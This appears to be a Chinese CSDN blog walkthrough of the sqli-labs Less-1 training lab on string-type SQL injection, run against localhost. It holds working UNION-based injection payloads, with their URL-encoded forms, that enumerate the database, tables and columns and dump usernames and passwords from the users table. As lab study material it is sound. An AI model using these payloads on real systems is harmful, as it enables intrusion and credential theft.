less-1 字符型注入

最新推荐文章于 2024-04-24 22:12:07 发布
最新推荐文章于 2024-04-24 22:12:07 发布
阅读量3.1k 收藏
点赞数
分类专栏: sql-labs通关日记 文章标签: 数据库 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52348955/article/details/121047942
版权

url编码:空格为20%,'为27%,#为23%
字符型注入的原理和判断方法在最下面的附录里:

第一步:

?id=999999999' union select 1,2,database()#

id设置为很大的原因:如果设置id为1,那么mysql确实查出了两条结果(即id=1查询到的结果和database查询到的结果),但是PHP代码决定了该页面只显示一行记录,所有让id等于一个很大的值或者-1,使得id查询不到结果,就只会显示第二条查询语句的结果
database()前面加了1,2,的原因请看附录

http://localhost/sqli-labs-master/Less-1/?id=999999999%27%20union%20select%201,2,database()%20%23

获得库名security:database()可获取当前使用的库名

在这里插入图片描述

第二步:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#

将某一列数据连成字符串输出而不是输出表格形式:select group_concat(column_name) from table_name;

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%23

获得security的表名:
information_schema库下的
tables表下的
table_name列
为所有数据库表名
利用table_schema=security定位

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MxONhqFu-1635562391023)(C:\Users\C4n\AppData\Roaming\Typora\typora-user-images\image-20211030103936722.png)]

第三步:

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%23

获取security下的users的列名:
information_schema库下的
columns表下的
column_name列
为所有数据库列名
利用table_name=user定位

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TuAINQG2-1635562391025)(C:\Users\C4n\AppData\Roaming\Typora\typora-user-images\image-20211030104051508.png)]

第四步:

?id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users#

0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20security.users%20%23

获取security下的users下的账号密码:
security库下的
users表下的
username列和password列
分别为账号和密码
在这里插入图片描述

附录:
字符型注入的原理和判断方法:
配合缩小页面ctrl+滚轮食用(不要打我)
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述
database()前面加了1,2,的原因:
使用union时union左右两边的查询语句查询到的列数必须相同
在这里插入图片描述

C4n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
③基于字符SQL注入
熊俊坤的博客
10-24 9904
基于字符SQL注入
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8960
SQL注入原理-字符注入
字符注入,报错注入
Dug123456_的博客
04-03 2329
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符注入
字符漏洞注入
最新发布
红客网络编程与渗透技术
04-24 1054
SQL注入是一种严重的安全漏洞,它允许攻击者在不受控制的情况下执行任意的SQL代码。字符注入SQL注入的一种形式,它涉及到在应用程序的输入框中插入恶意的字符串,以干扰正常的SQL查询执行。此外,可以通过搭建安全的测试环境来实践SQL注入的防御技术,以加深对这一安全漏洞的认识。输入验证和清理:对用户输入进行严格的验证和清理,确保只接受符合预期格式和长度的输入。SQL注入的基本原理是攻击者通过构造特定的输入,使得原本的SQL查询语句结构发生改变,从而执行攻击者指定的恶意SQL代码。
CTFHUB - SQL注入-整数字符注入
m0_64180167的博客
11-28 2299
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHUB——字符注入
陈艺秋的博客
01-14 429
sql整数注入
sqli-labs实验指导手册
11-17
1. **字符联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
SQLi-LABS Page-1(Basic Challenges)
07-24
2. **Less-2** 和 **Less-3** 关卡中,学习者需要识别数字字符注入,并利用SQLmap工具,这是一个自动化的SQL注入工具,来进行注入测试和数据提取。 3. **Less-4** 和 **Less-5** 提升了难度,不再仅仅是...
SQL注入之基于布尔的盲注详解
09-10
`http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23`这样的注入尝试用于获取第一个表名的第一...
sql-labs通关技巧
03-01
在`less1`中,通过尝试`id=1 and 1=2--+`,我们发现没有变化,这表明可能存在字符注入。接着,通过闭合单引号来确定注入,并进一步判断字段数。回显点的发现使得我们可以开始信息收集。利用`UNION SELECT`语句...
关于sql注入的简要演示(入坑抛砖)
09-09
在上述示例中,网站要求用户提供一个ID,例如`http://localhost/sqli/Less-1/?id=1`。正常情况下,这个ID会被用来从数据库中选择特定的记录。然而,如果用户输入的不是一个单纯的数字,而是一个包含SQL语法的字符串...
MySQL联合注入字符注入
m0_50211409的博客
03-27 1725
关于字符注入 首先我们都知道,在数据库字符串都是被单引号与双引号包裹起来的。 我们分析一下字符注入SQL语句 select*from admin where id='1' 这是字符注入后的语句 我们在传参的时候 ...
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 651
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
从2019极客大挑战sql题看sql注入
limenzzz的博客
04-07 1889
学了一段时间ctf后发现自己的基础还不是很扎实,于是打算记录一下学习过程,方便以后查看(归根结底还是太菜了_(:з」∠)_) 目录 1.easysql 2.babysql 1.easysql 直接使用万能密码发现语法出错,仔细看是引号要求双引号闭合(我是菜狗),闭合后输入得到flag。 另外附上常见万能密码表,防止以后出现过滤不知道怎么办。 sql注入之万能密码总结_無名之涟的博客-CSDN博客_sql万能密码 2.babysql ...
LESS-1-基础
xxzjwyql的博客
07-18 424
一、概念 1.什么是CSS预处理器? CSS 预处理器就是用某一种语言用来为 CSS 增加一些动态语言的的特性(变量、函数、继承等),CSS预处理器可以让你的 CSS 更见简洁,适应性更强,代码更直观等诸多好处; 简而言之: CSS预处理器就是升级版CSS 2.常见的CSS预处理器 Less、 Sass 、Stylus 1.为什么需要less? 1.1CSS的语法虽然简单, 但它同时也带来一些...
SQL注入字符、数字注入原理及注入步骤(sqli-labs-master 1-2关)
qiqi_w的博客
11-27 6233
SQL注入字符、数字注入原理及注入步骤 sqli-labs-master 1-2关演示截图
网络安全sql注入-less1
koala_king的博客
08-17 1364
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整还是字符 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
less-1
shawdow_bug的博客
07-22 291
打开页面后,根据提示,要在URL后面添加参数id,输入:/?id=1 (1)输入:/?id=1 and 1=1,页面没有变化,"and 1=1"有可能被当作SQL语句的一部分执行,也有可能只是作为字符串’1 and 1=1’的一部分。可以在数据库中测试一下: "="右边的字符串会进行数据类的转换,转换成字符串开头的数字 1,如果不以数字开头,则转换成 0: (2)输入:/?id=1 and 1=2,页面仍然没有变化,说明1后面的子字符串确实作为字符串的一部分。 (3)输入:/?id=1’,页面出现
SQL 字符注入
MZa1213123的博客
03-02 4394
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
安装less-loader 和less
09-08
1. 确定webpack的版本,选择合适的less-loader版本; 2. 使用npm命令安装less-loader,例如:npm install less-loader@7 --save-dev; 3. 确保已安装webpack和webpack-cli,如果没有请使用npm install webpack ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值